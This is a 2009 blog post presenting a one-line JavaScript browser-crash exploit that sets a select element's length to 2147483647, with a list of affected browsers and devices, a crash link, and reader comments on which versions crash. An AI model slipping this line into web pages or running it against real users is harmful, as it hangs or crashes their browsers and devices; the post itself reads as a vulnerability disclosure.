Account

Log in (OpenID enabled)

A Short Javascript Exploit

Category: Hacking   Tags: ,

Here is a new and amusing way to crash your browser. What is so special about it, is that it affects a wide variety of browsers.

  • Internet Explorer 5, 6, 7, 8 (all versions)
  • Chrome (limited)
  • Firefox: Anything older than 3.0.5 and 2.0.0.19
  • Opera
  • Seamonkey
  • Midbrowser
  • Netscape 6 & 8 (9 years ago)
  • Konqueror (all versions)
  • Apple iPhone + iPod
  • Apple Safari
  • Thunderbird
  • Nokia Phones : Nokia N95 (Symbian OS v.9.2),Nokia N82, Nokia N810 Internet Tablet
  • Aigo P8860 (Browser hangs and cannot be restarted)
  • Siemens phones
  • Google T-Mobile G1 TC4-RC30
  • Ubuntu (Operating system sometimes reboots, memory management failure)
  • possibly more devices and products that support Javascript

Here is the source code:

document.createElement('select').length = 2147483647;

Click Here to Crash Your Browser

If your browser is vulnerable, it should start taking up all your memory and eventually crash.

Source: G-Sec

  • Reddit
  • HackerNews
  • Twitter
  • DZone
  • del.icio.us
  • FriendFeed
  • StumbleUpon
  • RSS

Related posts:

  1. A Browser is not a Search Engine
  2. Clearing Passwords in Memory with Python
  3. Google hires laid-off Microsoft evangelist. He then writes a blog post bashing Microsoft.
  4. Benchmarking Browsers with Real Websites: Chrome, Firefox, Opera, Safari, IE
  5. Patching a Program Without Source Code: How to be like the Skype Hacker for Newbies

Posted Thursday, July 16th, 2009 at 6:33 pm. Filed under Hacking. You can follow comments here through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

8 Comments  »

  1. dispy457 says:
    16.07.09 at 19:01

    Opera 9.80 – do it well -nothing vulnerable and no crash or problems at all.

    Reply
    • admin says:
      16.07.09 at 19:11

      Some Opera versions are safe. The original publisher of the exploit didn’t say which ones though.

      Reply
  2. wok_dwn says:
    17.07.09 at 05:16

    Tested with available browsers: OS Windows XP, SP 3.
    Google Chrome 2.0.172.33 – NO crash
    Firefox 3.0.11 – NO crash
    Opera 9.27 – crash
    IE 8.0.6001 – crash

    Reply
  3. Michael says:
    17.07.09 at 16:02

    Worth noting just as a reference, the latest Webkit nightlies are not affected by this.

    Reply
  4. Fabio says:
    17.07.09 at 17:20

    Opera 10 beta 2 didnt crash

    Reply
  5. dispy457 says:
    18.07.09 at 08:23

    Chrome (dev channel) 3.0.193.1 ……….(no crash)
    Chromium 3.0.195………………………….(no crash)
    Opera 9.80…1643 build…………………..(no crash)
    Firefox 3.5…………………………………….(no crash)
    LunaScape 5.1.2 (using WebKit core)….(no crash)
    LunaScape 5.1.2 (using Gecko core)…..(no crash)
    LunaScape 5.1.2 (using Trident core)….(no crash)

    Reply
  6. keenie says:
    18.07.09 at 09:17

    What about Maxthon 2, Maxthon 3 ???? Is them vulnerable to this?
    And Safari – is all versions vulnerable or only older ??? (3.0,,,, 4.0)

    Reply

RSS feed for comments on this post, TrackBack URI


Leave a Comment

(Cookies must be enabled)